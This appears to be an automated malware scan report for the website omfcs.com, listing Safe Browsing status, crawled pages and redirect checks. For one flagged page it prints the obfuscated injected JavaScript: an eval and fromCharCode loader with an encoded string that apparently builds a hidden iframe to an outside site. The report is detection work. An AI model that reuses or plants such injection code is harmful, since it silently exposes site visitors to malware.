Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omfcs.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.omfcs.com/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 21:34:24 GMT Accept-Ranges: bytes ETag: "474fecf4527fcf1:1530" Server: Microsoft-IIS/6.0 Content-Length: 6976 Content-Location: http://www.omfcs.com/index.htm Content-Type: text/html Last-Modified: Tue, 03 Jun 2014 17:40:49 GMT X-Powered-By: ASP.NET | clean |
http://www.omfcs.com/index.htm | 200 OK Content-Length: 6976 Content-Type: text/html | clean |
http://www.omfcs.com/reg/Registration_Demo.asp | 200 OK Content-Length: 16968 Content-Type: text/html | clean |
http://www.omfcs.com/reg/demo/Registration_Admin.asp | 200 OK Content-Length: 6946 Content-Type: text/html | clean |
http://www.omfcs.com/reg/demo/Registration.asp | 200 OK Content-Length: 11844 Content-Type: text/html | clean |
http://www.omfcs.com/reg/Join_OMFCS.asp | 200 OK Content-Length: 14318 Content-Type: text/html | clean |
http://www.omfcs.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.omfcs.com/reg/demo/Registration_Manager.asp | 200 OK Content-Length: 6838 Content-Type: text/html | clean |
http://www.omfcs.com/reg/demo/Registration_Display_StudentsByClass.asp | 200 OK Content-Length: 7258 Content-Type: text/html | clean |
http://www.omfcs.com/reg/demo/Registration_Display_ClassSchedule.asp | 200 OK Content-Length: 8823 Content-Type: text/html | clean |
http://www.omfcs.com/reg/demo/Tuition_Manager.asp | 200 OK Content-Length: 6840 Content-Type: text/html | clean |
http://www.omfcs.com/testimony-omfcs.htm | 200 OK Content-Length: 14875 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="split";w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,61,5e,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,61,5e,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,64,63,24,62,60,65,5b,5c,69,6e,5c,63,6b, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omfcs.com
Result:
GET / HTTP/1.1
Host: omfcs.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: omfcs.com
Referer: http://www.google.com/search?q=omfcs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omfcs.com
Referer: http://www.google.com/search?q=omfcs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.